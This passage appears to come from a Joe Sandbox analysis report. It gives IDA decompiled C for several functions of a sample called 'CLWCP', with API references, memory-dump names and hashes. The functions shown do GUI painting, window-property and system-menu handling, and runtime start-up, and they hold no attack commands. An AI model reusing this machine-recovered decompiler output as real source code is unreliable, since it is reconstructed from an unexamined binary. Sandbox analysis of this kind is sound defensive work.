				struct HDC__* _t55;
				intOrPtr* _t83;
				intOrPtr _t102;
				void* _t103;
				void* _t108;
				void* _t111;
				void* _t113;
				intOrPtr _t114;

				_t111 = _t113;
				_t114 = _t113 + 0xffffff94;
				_push(_t103);
				_t108 = __edx;
				_t83 = __eax;
				if( *((char*)(__eax + 0x210)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
					if(( *(_t83 + 0x55) & 0x00000001) != 0 || E00438204(_t83) != 0) {
						_t38 = E004394B4(_t83, _t83, _t108, _t103, _t108);
					} else {
						_t38 =  *((intOrPtr*)( *_t83 - 0x10))();
					}
					return _t38;
				} else {
					L004066E4();
					 *((intOrPtr*)( *__eax + 0x44))();
					 *((intOrPtr*)( *__eax + 0x44))();
					_t47 = _v104;
					L0040636C();
					_v12 = _t47;
					L00406944();
					L00406374();
					_v8 = _t47;
					_v16 = SelectObject(_v8, _v12);
					 *[fs:eax] = _t114;
					_t55 = BeginPaint(E0043BA58(_t83),  &_v80);
					E00435DE4(_t83, _v8, 0x14, _v8);
					 *((intOrPtr*)(_t108 + 4)) = _v8;
					E00439A78(_t83, _t108);
					 *((intOrPtr*)(_t108 + 4)) = 0;
					 *((intOrPtr*)( *_t83 + 0x44))(_v8, 0, 0, 0xcc0020,  *[fs:eax], 0x439bca, _t111, 0, 0, __eax, __eax, _t47, _v84, 0);
					 *((intOrPtr*)( *_t83 + 0x44))(_v84);
					_push(_v104);
					_push(0);
					_push(0);
					L0040634C();
					EndPaint(E0043BA58(_t83),  &_v80);
					_t102 = _t55;
					 *[fs:eax] = _t102;
					_push(0x439bd1);
					SelectObject(_v8, _v16);
					DeleteDC(_v8);
					return DeleteObject(_v12);
				}
			}

























                                  0x00439a79
                                  0x00439a7b
                                  0x00439a80
                                  0x00439a81
                                  0x00439a83
                                  0x00439a8c
                                  0x00439a98
                                  0x00439ab7
                                  0x00439aa5
                                  0x00439aab
                                  0x00439aab
                                  0x00439bd7
                                  0x00439ac1
                                  0x00439ac3
                                  0x00439ad1
                                  0x00439adf
                                  0x00439ae2
                                  0x00439ae7
                                  0x00439aec
                                  0x00439af2
                                  0x00439af9
                                  0x00439afe
                                  0x00439b0e
                                  0x00439b1c
                                  0x00439b2b
                                  0x00439b40
                                  0x00439b48
                                  0x00439b4f
                                  0x00439b56
                                  0x00439b6d
                                  0x00439b7b
                                  0x00439b81
                                  0x00439b82
                                  0x00439b84
                                  0x00439b87
                                  0x00439b98
                                  0x00439b9f
                                  0x00439ba2
                                  0x00439ba5
                                  0x00439bb2
                                  0x00439bbb
                                  0x00439bc9
                                  0x00439bc9

                                  APIs
                                  • 72E7AC50.USER32(00000000), ref: 00439AC3
                                  • 72E7A520.GDI32(00000000,?), ref: 00439AE7
                                  • 72E7B380.USER32(00000000,00000000,00000000,?), ref: 00439AF2
                                  • 72E7A590.GDI32(00000000,00000000,00000000,00000000,?), ref: 00439AF9
                                  • SelectObject.GDI32(0042C095,?), ref: 00439B09
                                  • BeginPaint.USER32(00000000,?,00000000,00439BCA,?,0042C095,?,00000000,00000000,00000000,00000000,?), ref: 00439B2B
                                  • 72E897E0.GDI32(00000000,00000000,00000000,?,?,0042C095,?,00000000,00000000,00000000,00000000,?), ref: 00439B87
                                  • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,0042C095,?,00000000,00000000,00000000,00000000,?), ref: 00439B98
                                  • SelectObject.GDI32(0042C095,?), ref: 00439BB2
                                  • DeleteDC.GDI32(0042C095), ref: 00439BBB
                                  • DeleteObject.GDI32(?), ref: 00439BC4
                                    • Part of subcall function 004394B4: BeginPaint.USER32(00000000,?,?,?,00000000), ref: 004394DF
                                    • Part of subcall function 004394B4: EndPaint.USER32(00000000,?,00439608,00000000), ref: 004395FB
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Paint$Object$BeginDeleteSelect$A520A590B380E897
                                  • String ID:
                                  • API String ID: 3782911080-0
                                  • Opcode ID: f1af1dc31865d46e1ed7c6babf66c9387a02ac5e063a466a7c87fcf094983782
                                  • Instruction ID: e72070dadec6f266ba2dee52820db078d7f989e85616961c7ac405573a5467ab
                                  • Opcode Fuzzy Hash: f1af1dc31865d46e1ed7c6babf66c9387a02ac5e063a466a7c87fcf094983782
                                  • Instruction Fuzzy Hash: CE414F71B00244AFCB00EBA9CD85F9EB7F8AB48704F10547AB906EB381DAB9DD05CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00431760, Relevance: 16.6, APIs: 11, Instructions: 91COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E00431760(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t29;
				void* _t32;
				void* _t38;
				void* _t42;
				void* _t46;
				void* _t54;
				signed int _t57;
				struct HWND__* _t58;
				intOrPtr* _t61;

				_t61 =  &_v8;
				_t29 =  *0x46ecf0; // 0x0
				 *((intOrPtr*)(_t29 + 0x188)) = _a4;
				if(IsWindowUnicode(_a4) == 0) {
					_t32 =  *0x46ecf0; // 0x0
					SetWindowLongA(_a4, 0xfffffffc,  *(_t32 + 0x194));
					if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
						SetWindowLongA(_a4, 0xfffffff4, _a4);
					}
				} else {
					_t54 =  *0x46ecf0; // 0x0
					_push( *((intOrPtr*)(_t54 + 0x194)));
					_push(0xfffffffc);
					_push(_a4);
					L004069F4();
					_push(0xfffffff0);
					_t57 = _a4;
					_push(_t57);
					L004067FC();
					if((_t57 & 0x40000000) != 0) {
						_push(0xfffffff4);
						_t58 = _a4;
						_push(_t58);
						L004067FC();
						if(_t58 == 0) {
							_push(_a4);
							_push(0xfffffff4);
							_push(_a4);
							L004069F4();
						}
					}
				}
				_t38 =  *0x46ecf0; // 0x0
				SetPropA(_a4,  *0x470aae & 0x0000ffff, _t38);
				_t42 =  *0x46ecf0; // 0x0
				SetPropA(_a4,  *0x470aac & 0x0000ffff, _t42);
				_t46 =  *0x46ecf0; // 0x0
				 *0x46ecf0 = 0;
				_v8 =  *((intOrPtr*)(_t46 + 0x194))(_a4, _a8, _a12, _a16);
				return  *_t61;
			}













                                  0x00431765
                                  0x00431768
                                  0x00431770
                                  0x00431781
                                  0x004317cc
                                  0x004317de
                                  0x004317f3
                                  0x0043180e
                                  0x0043180e
                                  0x00431783
                                  0x00431783
                                  0x0043178e
                                  0x0043178f
                                  0x00431794
                                  0x00431795
                                  0x0043179a
                                  0x0043179c
                                  0x0043179f
                                  0x004317a0
                                  0x004317aa
                                  0x004317ac
                                  0x004317ae
                                  0x004317b1
                                  0x004317b2
                                  0x004317b9
                                  0x004317be
                                  0x004317bf
                                  0x004317c4
                                  0x004317c5
                                  0x004317c5
                                  0x004317b9
                                  0x004317aa
                                  0x00431813
                                  0x00431825
                                  0x0043182a
                                  0x0043183c
                                  0x0043184d
                                  0x00431852
                                  0x00431862
                                  0x0043186a

                                  APIs
                                  • IsWindowUnicode.USER32(?), ref: 0043177A
                                  • 72E7B5A0.USER32(?,000000FC,?,?), ref: 00431795
                                  • 72E7B110.USER32(?,000000F0,?,000000FC,?,?), ref: 004317A0
                                  • 72E7B110.USER32(?,000000F4,?,000000F0,?,000000FC,?,?), ref: 004317B2
                                  • 72E7B5A0.USER32(?,000000F4,?,?,000000F4,?,000000F0,?,000000FC,?,?), ref: 004317C5
                                  • SetWindowLongA.USER32 ref: 004317DE
                                  • GetWindowLongA.USER32 ref: 004317E9
                                  • GetWindowLongA.USER32 ref: 004317FB
                                  • SetWindowLongA.USER32 ref: 0043180E
                                  • SetPropA.USER32(?,00000000,00000000), ref: 00431825
                                  • SetPropA.USER32(?,00000000,00000000), ref: 0043183C
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$Long$B110Prop$Unicode
                                  • String ID:
                                  • API String ID: 1632958030-0
                                  • Opcode ID: a4fd66b7268618f4525f225a95c4a95e6192e2d7872b353d1e6b3762c27ffc49
                                  • Instruction ID: 4d320b883aae1b298c964fffbdf92de92ef982c3d6f5d0821cdac3fab529cc75
                                  • Opcode Fuzzy Hash: a4fd66b7268618f4525f225a95c4a95e6192e2d7872b353d1e6b3762c27ffc49
                                  • Instruction Fuzzy Hash: 79312EB6500214BFDF10EF99DC85EAA37ECAB08364F104625FD29DB2E2D738D9509B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041E0E8, Relevance: 15.2, APIs: 10, Instructions: 224windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 81%
                                  			E0041E0E8(intOrPtr* __eax, intOrPtr* __ecx, int* __edx, void* __fp0, intOrPtr _a4, int* _a8) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				int _v16;
				int _v20;
				int _v24;
				long _v28;
				long _v32;
				struct HDC__* _v36;
				intOrPtr* _v40;
				void* _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HDC__* _t191;
				int* _t196;
				intOrPtr _t210;
				int _t216;
				int* _t218;
				void* _t221;
				void* _t223;
				intOrPtr _t224;

				_t198 = __ecx;
				_t221 = _t223;
				_t224 = _t223 + 0xffffffd8;
				_v12 = __ecx;
				_t218 = __edx;
				_v8 = __eax;
				_t196 = _a8;
				if(_v12 != 0) {
					E0041E554(_v8);
					 *[fs:eax] = _t224;
					 *((intOrPtr*)( *_v8 + 0x10))( *[fs:eax], 0x41e391, _t221);
					E0041E9AC(_v8, __ecx,  *0x41e3a4 & 0x000000ff);
					E0041E554(E00422D98(_v12));
					_push(_t221);
					_push(0x41e36c);
					_push( *[fs:eax]);
					 *[fs:eax] = _t224;
					_v20 = _t218[2] -  *_t218;
					_v24 = _t218[3] - _t218[1];
					_t216 = _t196[2] -  *_t196;
					_v16 = _t196[3] - _t196[1];
					if(E00422F70(_v12, _t198) != _a4) {
						_v40 = E004227C4(1);
						_t198 =  *_v40;
						 *((intOrPtr*)( *_v40 + 8))();
						E004230E4(_v40, _a4, __eflags, __fp0);
						E0041E9AC(E00422D98(_v40),  *_v40,  *0x41e3a8 & 0x000000ff);
						_v36 =  *((intOrPtr*)(E00422D98(_v40) + 4));
						__eflags = 0;
						_v44 = 0;
					} else {
						_v40 = 0;
						_t191 =  *((intOrPtr*)( *_v12 + 0x68))();
						_v44 = _t191;
						_push(0);
						L00406374();
						_v36 = _t191;
						_v44 = SelectObject(_v36, _v44);
					}
					_push(_t221);
					_push(0x41e34a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t224;
					E0041E9AC(E00422D98(_v12), _t198,  *0x41e3a8 & 0x000000ff);
					if(E0041DF8C( *((intOrPtr*)(_v8 + 0x14))) != 1) {
						StretchBlt( *(_v8 + 4),  *_t218, _t218[1], _v20, _v24,  *(E00422D98(_v12) + 4),  *_t196, _t196[1], _t216, _v16, 0xcc0020);
						_v32 = SetTextColor( *(_v8 + 4), 0);
						_v28 = SetBkColor( *(_v8 + 4), 0xffffff);
						StretchBlt( *(_v8 + 4),  *_t218, _t218[1], _v20, _v24, _v36,  *_t196, _t196[1], _t216, _v16, 0xe20746);
						SetTextColor( *(_v8 + 4), _v32);
						SetBkColor( *(_v8 + 4), _v28);
					} else {
						E0041EE84( *(_v8 + 4), _t196, _t218[1],  *_t218, _t216, _t218, _t196[1],  *_t196, _v36, _v16, _t216, _t196[1],  *_t196,  *(E00422D98(_v12) + 4), _v24, _v20);
					}
					_pop(_t210);
					 *[fs:eax] = _t210;
					_push(0x41e351);
					if(_v40 == 0) {
						__eflags = _v44;
						if(_v44 != 0) {
							SelectObject(_v36, _v44);
						}
						return DeleteDC(_v36);
					} else {
						return E00403398(_v40);
					}
				}
				return __eax;
			}

























                                  0x0041e0e8
                                  0x0041e0e9
                                  0x0041e0eb
                                  0x0041e0f1
                                  0x0041e0f4
                                  0x0041e0f6
                                  0x0041e0f9
                                  0x0041e100
                                  0x0041e109
                                  0x0041e119
                                  0x0041e121
                                  0x0041e12e
                                  0x0041e13b
                                  0x0041e142
                                  0x0041e143
                                  0x0041e148
                                  0x0041e14b
                                  0x0041e153
                                  0x0041e15c
                                  0x0041e162
                                  0x0041e16a
                                  0x0041e178
                                  0x0041e1b2
                                  0x0041e1bb
                                  0x0041e1bd
                                  0x0041e1c6
                                  0x0041e1da
                                  0x0041e1ea
                                  0x0041e1ed
                                  0x0041e1ef
                                  0x0041e17a
                                  0x0041e17c
                                  0x0041e184
                                  0x0041e187
                                  0x0041e18a
                                  0x0041e18c
                                  0x0041e191
                                  0x0041e1a1
                                  0x0041e1a1
                                  0x0041e1f4
                                  0x0041e1f5
                                  0x0041e1fa
                                  0x0041e1fd
                                  0x0041e20f
                                  0x0041e221
                                  0x0041e296
                                  0x0041e2a9
                                  0x0041e2bd
                                  0x0041e2eb
                                  0x0041e2fb
                                  0x0041e30b
                                  0x0041e223
                                  0x0041e259
                                  0x0041e259
                                  0x0041e312
                                  0x0041e315
                                  0x0041e318
                                  0x0041e321
                                  0x0041e32d
                                  0x0041e331
                                  0x0041e33b
                                  0x0041e33b
                                  0x00000000
                                  0x0041e323
                                  0x00000000
                                  0x0041e326
                                  0x0041e321
                                  0x0041e39e

                                  APIs
                                    • Part of subcall function 0041E554: RtlEnterCriticalSection.KERNEL32(004708CC,00000000,0041CCC2,00000000,0041CD21), ref: 0041E55C
                                    • Part of subcall function 0041E554: RtlLeaveCriticalSection.KERNEL32(004708CC,004708CC,00000000,0041CCC2,00000000,0041CD21), ref: 0041E569
                                    • Part of subcall function 0041E554: RtlEnterCriticalSection.KERNEL32(00000038,004708CC,004708CC,00000000,0041CCC2,00000000,0041CD21), ref: 0041E572
                                  • 72E7A590.GDI32(00000000), ref: 0041E18C
                                  • SelectObject.GDI32(?,?), ref: 0041E19C
                                  • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00CC0020), ref: 0041E296
                                  • SetTextColor.GDI32(?,00000000), ref: 0041E2A4
                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 0041E2B8
                                  • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00E20746), ref: 0041E2EB
                                  • SetTextColor.GDI32(?,?), ref: 0041E2FB
                                  • SetBkColor.GDI32(?,?), ref: 0041E30B
                                  • SelectObject.GDI32(?,00000000), ref: 0041E33B
                                  • DeleteDC.GDI32(?), ref: 0041E344
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Color$CriticalSection$EnterObjectSelectStretchText$A590DeleteLeave
                                  • String ID:
                                  • API String ID: 2975480410-0
                                  • Opcode ID: 7cc31a96ad4f507255d28fe845969a21bf4d32e41b7a5e4bd06d8911856b7490
                                  • Instruction ID: f6335378c440144200d1eece051275da75abc03aecc9b6a0c341b4d61ac06291
                                  • Opcode Fuzzy Hash: 7cc31a96ad4f507255d28fe845969a21bf4d32e41b7a5e4bd06d8911856b7490
                                  • Instruction Fuzzy Hash: 6591C775A00118EFCB40DFA9C985E9EBBF8EF4D304B1544AAF918EB251C635ED40CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00439638, Relevance: 15.2, APIs: 10, Instructions: 218windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E00439638(intOrPtr __eax, void* __ecx, struct HDC__* __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				int _v16;
				intOrPtr _v20;
				int _v24;
				intOrPtr _v28;
				struct tagRECT _v44;
				intOrPtr _t117;
				int _t120;
				void* _t199;
				int _t201;
				intOrPtr _t227;
				void* _t233;
				void* _t234;
				void* _t237;
				void* _t238;
				void* _t241;
				void* _t243;
				intOrPtr _t244;

				_t241 = _t243;
				_t244 = _t243 + 0xffffffd8;
				_t199 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)(_v8 + 0x1b0)) != 0 &&  *((char*)(_v8 + 0x1af)) != 0 &&  *((intOrPtr*)(_v8 + 0x184)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x184)))) + 0x20))();
				}
				_t117 = _v8;
				_t118 =  *((intOrPtr*)(_t117 + 0x1a0));
				if( *((intOrPtr*)(_t117 + 0x1a0)) == 0) {
					L17:
					_t120 =  *(_v8 + 0x1a4);
					if(_t120 != 0) {
						_t233 =  *((intOrPtr*)(_t120 + 8)) - 1;
						if(_t233 >= 0) {
							_t234 = _t233 + 1;
							_v16 = 0;
							do {
								_t120 = E00413D2C( *(_v8 + 0x1a4), _v16);
								_t201 = _t120;
								if( *((char*)(_t201 + 0x1ad)) != 0 && ( *(_t201 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t201 + 0x57)) != 0 || ( *(_t201 + 0x1c) & 0x00000010) != 0 && ( *(_t201 + 0x51) & 0x00000004) == 0)) {
									_t237 = CreateSolidBrush(E0041D170(0xff000010));
									E004128F0( *((intOrPtr*)(_t201 + 0x40)) - 1,  *((intOrPtr*)(_t201 + 0x40)) +  *((intOrPtr*)(_t201 + 0x48)),  *((intOrPtr*)(_t201 + 0x44)) - 1,  &_v44,  *((intOrPtr*)(_t201 + 0x44)) +  *((intOrPtr*)(_t201 + 0x4c)));
									FrameRect(_v12,  &_v44, _t237);
									DeleteObject(_t237);
									_t238 = CreateSolidBrush(E0041D170(0xff000014));
									E004128F0( *((intOrPtr*)(_t201 + 0x40)),  *((intOrPtr*)(_t201 + 0x40)) +  *((intOrPtr*)(_t201 + 0x48)) + 1,  *((intOrPtr*)(_t201 + 0x44)),  &_v44,  *((intOrPtr*)(_t201 + 0x44)) +  *((intOrPtr*)(_t201 + 0x4c)) + 1);
									FrameRect(_v12,  &_v44, _t238);
									_t120 = DeleteObject(_t238);
								}
								_v16 = _v16 + 1;
								_t234 = _t234 - 1;
							} while (_t234 != 0);
						}
					}
					return _t120;
				} else {
					_v16 = 0;
					if(_t199 != 0) {
						_v16 = E00413D88(_t118, _t199);
						if(_v16 < 0) {
							_v16 = 0;
						}
					}
					_v20 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x1a0)) + 8));
					while(_v16 < _v20) {
						_v28 = E00413D2C( *((intOrPtr*)(_v8 + 0x1a0)), _v16);
						if( *((char*)(_v28 + 0x57)) != 0 || ( *(_v28 + 0x1c) & 0x00000010) != 0 && ( *(_v28 + 0x51) & 0x00000004) == 0) {
							E004128F0( *((intOrPtr*)(_v28 + 0x40)),  *((intOrPtr*)(_v28 + 0x40)) +  *(_v28 + 0x48),  *((intOrPtr*)(_v28 + 0x44)),  &_v44,  *((intOrPtr*)(_v28 + 0x44)) +  *(_v28 + 0x4c));
							if(RectVisible(_v12,  &_v44) == 0) {
								goto L16;
							} else {
								if(( *(_v8 + 0x54) & 0x00000080) != 0) {
									 *(_v28 + 0x54) =  *(_v28 + 0x54) | 0x00000080;
								}
								_v24 = SaveDC(_v12);
								_push(_t241);
								_push(0x4397c6);
								_push( *[fs:eax]);
								 *[fs:eax] = _t244;
								E004333E0(_v12,  *((intOrPtr*)(_v28 + 0x44)),  *((intOrPtr*)(_v28 + 0x40)));
								IntersectClipRect(_v12, 0, 0,  *(_v28 + 0x48),  *(_v28 + 0x4c));
								E00435DE4(_v28, _v12, 0xf, 0);
								_pop(_t227);
								 *[fs:eax] = _t227;
								_push(0x4397cd);
								return RestoreDC(_v12, _v24);
							}
						} else {
							goto L16;
						}
						goto L28;
						L16:
						_v16 = _v16 + 1;
					}
					goto L17;
				}
				L28:
			}






















                                  0x00439639
                                  0x0043963b
                                  0x00439641
                                  0x00439643
                                  0x00439646
                                  0x00439653
                                  0x0043967b
                                  0x0043967b
                                  0x0043967e
                                  0x00439681
                                  0x00439689
                                  0x004397e5
                                  0x004397e8
                                  0x004397f0
                                  0x004397f9
                                  0x004397fc
                                  0x00439802
                                  0x00439803
                                  0x0043980a
                                  0x00439816
                                  0x0043981b
                                  0x00439824
                                  0x0043985e
                                  0x0043987a
                                  0x00439887
                                  0x0043988d
                                  0x004398a2
                                  0x004398be
                                  0x004398cb
                                  0x004398d1
                                  0x004398d1
                                  0x004398d6
                                  0x004398d9
                                  0x004398d9
                                  0x0043980a
                                  0x004397fc
                                  0x004398e6
                                  0x0043968f
                                  0x00439691
                                  0x00439696
                                  0x0043969f
                                  0x004396a6
                                  0x004396aa
                                  0x004396aa
                                  0x004396a6
                                  0x004396b9
                                  0x004396c2
                                  0x004396d9
                                  0x004396e3
                                  0x00439724
                                  0x00439738
                                  0x00000000
                                  0x0043973e
                                  0x00439745
                                  0x0043974a
                                  0x0043974a
                                  0x00439759
                                  0x0043975e
                                  0x0043975f
                                  0x00439764
                                  0x00439767
                                  0x00439779
                                  0x00439794
                                  0x004397a6
                                  0x004397ad
                                  0x004397b0
                                  0x004397b3
                                  0x004397c5
                                  0x004397c5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004397d6
                                  0x004397d6
                                  0x004397dc
                                  0x00000000
                                  0x004396c2
                                  0x00000000

                                  APIs
                                  • RectVisible.GDI32(?,?), ref: 00439731
                                  • SaveDC.GDI32(?), ref: 00439754
                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00439794
                                  • RestoreDC.GDI32(?,004395D8), ref: 004397C0
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Rect$ClipIntersectRestoreSaveVisible
                                  • String ID:
                                  • API String ID: 1976014923-0
                                  • Opcode ID: 3546f373e83fc68d7760aece48239dfa81fbd341cad409d09d2690410578dded
                                  • Instruction ID: cfd5595485f10f58d79b5b626d758ba1910fda7a512c8ffe6aacfc0aa1e278e3
                                  • Opcode Fuzzy Hash: 3546f373e83fc68d7760aece48239dfa81fbd341cad409d09d2690410578dded
                                  • Instruction Fuzzy Hash: 2C910A74A10208AFDB04EF99C485BEEBBF8AF48314F1540A6E904EB396D779ED40CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004514B8, Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004514B8(intOrPtr _a4) {
				intOrPtr _t27;
				struct HMENU__* _t48;

				_t27 =  *((intOrPtr*)(_a4 - 4));
				if( *((char*)(_t27 + 0x241)) != 0) {
					_t27 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t27 + 0x240) & 0x00000001) != 0) {
						_t27 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t27 + 0x247)) != 1) {
							_t48 = GetSystemMenu(E0043BA58( *((intOrPtr*)(_a4 - 4))), 0);
							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x241)) == 3) {
								DeleteMenu(_t48, 0xf130, 0);
								DeleteMenu(_t48, 7, 0x400);
								DeleteMenu(_t48, 5, 0x400);
								DeleteMenu(_t48, 0xf030, 0);
								DeleteMenu(_t48, 0xf020, 0);
								DeleteMenu(_t48, 0xf000, 0);
								return DeleteMenu(_t48, 0xf120, 0);
							}
							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x240) & 0x00000002) == 0) {
								EnableMenuItem(_t48, 0xf020, 1);
							}
							_t27 =  *((intOrPtr*)(_a4 - 4));
							if(( *(_t27 + 0x240) & 0x00000004) == 0) {
								return EnableMenuItem(_t48, 0xf030, 1);
							}
						}
					}
				}
				return _t27;
			}





                                  0x004514bf
                                  0x004514c9
                                  0x004514d2
                                  0x004514dc
                                  0x004514e5
                                  0x004514ef
                                  0x00451508
                                  0x00451517
                                  0x00451521
                                  0x0045152e
                                  0x0045153b
                                  0x00451548
                                  0x00451555
                                  0x00451562
                                  0x00000000
                                  0x0045156f
                                  0x00451583
                                  0x0045158d
                                  0x0045158d
                                  0x00451595
                                  0x0045159f
                                  0x00000000
                                  0x004515a9
                                  0x0045159f
                                  0x004514ef
                                  0x004514dc
                                  0x004515b0

                                  APIs
                                  • GetSystemMenu.USER32(00000000,00000000), ref: 00451503
                                  • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00451521
                                  • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0045152E
                                  • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0045153B
                                  • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00451548
                                  • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00451555
                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00451562
                                  • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0045156F
                                  • EnableMenuItem.USER32 ref: 0045158D
                                  • EnableMenuItem.USER32 ref: 004515A9
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Menu$Delete$EnableItem$System
                                  • String ID:
                                  • API String ID: 3985193851-0
                                  • Opcode ID: 6c093225d095ab61fa18efbb44118406cc5f423406637c70e94709c6b4b5f515
                                  • Instruction ID: 3de494a1271458e31ffeb08a7330e898f60accc18c083eba1e8a3f962a69d976
                                  • Opcode Fuzzy Hash: 6c093225d095ab61fa18efbb44118406cc5f423406637c70e94709c6b4b5f515
                                  • Instruction Fuzzy Hash: 782121707813447BE731EB25CC8EF597AD89B04719F0540A6BA4A7F2D3C6B8EA94861C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405D99, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 40threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405D99(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edx, intOrPtr* __edi, void* __esi) {
				long _t14;
				signed int _t15;
				void* _t19;

				_t19 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *__edx =  *__edx + (__eax - 0x004705b8 | __eax - 0x004705b8);
				 *0x470014 = 0x4011fc;
				 *0x470018 = 0x401204;
				 *0x47004a = 2;
				 *0x470000 = E00404EE8;
				if(E004031E0() != 0) {
					_t5 = E00403210();
				}
				E004032D4(_t5);
				 *0x470050 = 0xd7b0;
				 *0x47021c = 0xd7b0;
				 *0x4703e8 = 0xd7b0;
				 *0x47003c = GetCommandLineA();
				 *0x470038 = E00401324();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					E00405CD0(GetThreadLocale(), _t19, __eflags);
				} else {
					_t15 = GetVersion();
					_t28 = (_t15 & 0x000000ff) - 4;
					if((_t15 & 0x000000ff) <= 4) {
						E00405CD0(GetThreadLocale(), _t19, _t28);
					}
				}
				 *0x4705bc = GetACP();
				_t14 = GetCurrentThreadId();
				 *0x470030 = _t14;
				return _t14;
			}






                                  0x00405d99
                                  0x00405d9e
                                  0x00405daa
                                  0x00405dac
                                  0x00405db6
                                  0x00405dc0
                                  0x00405dc7
                                  0x00405dd8
                                  0x00405dda
                                  0x00405dda
                                  0x00405ddf
                                  0x00405de4
                                  0x00405ded
                                  0x00405df6
                                  0x00405e04
                                  0x00405e0e
                                  0x00405e22
                                  0x00405e45
